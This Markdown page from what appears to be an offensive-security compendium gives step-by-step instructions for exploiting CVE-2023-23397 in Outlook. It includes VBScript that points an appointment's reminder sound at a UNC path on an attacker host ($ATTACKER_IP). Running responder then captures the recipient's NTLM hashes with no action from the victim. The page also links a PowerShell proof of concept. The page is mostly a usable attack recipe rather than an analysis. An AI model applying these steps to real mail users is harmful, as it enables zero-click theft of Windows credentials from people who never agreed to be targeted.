killchain-compendium/Exploits/Windows/Outlook.md

34 lines
1.2 KiB
Markdown
Raw Normal View History

2023-03-25 15:31:51 +01:00
# Outlook Exploits
## CVE-2023-23397
Create an Appointment with a custom and malicious reminder sound. The sound file download uses __Universal Naming Convention (UNC)__ paths to refrence the file. The file is stored on a server controlled by the attacker. Goal is to get the NTLM(v2) Hashes. There needs to be no interaction by the target.
Therefore, __PidLidReminderFileParameter__ have to be altered containing the UNC, for example `\\$ATTACKER_IP:$ATTACKER_PORT\payload.wav`. The source of the file may use __SMB__ or __WebDAV__.
Further, __PidLidReminderOverride__ has to be set to __true__.
### Usage
`New Appointment` --> set `Reminder` to 0 minutes.
`Outlook Spy` plugin is needed. Go to `OutlookSpy` tab, press `CurrentItem` and go to `Script`
Set the following variables:
```vbscript
AppointmentItem.ReminderOverrideDefault = true
AppointmentItem.ReminderPlaySound = true
AppointmentItem.ReminderSoundFile = "\\$ATTACKER_IP\payloads\alert.wav"
```
* Set up `responder -I <interface>` to catch the NTLM hash.
Press `Run` to save the variables. Send the appointment afterwards.
### Resources
* [api0cradle's Powershell POC](https://github.com/api0cradle/CVE-2023-23397-POC-Powershell.git)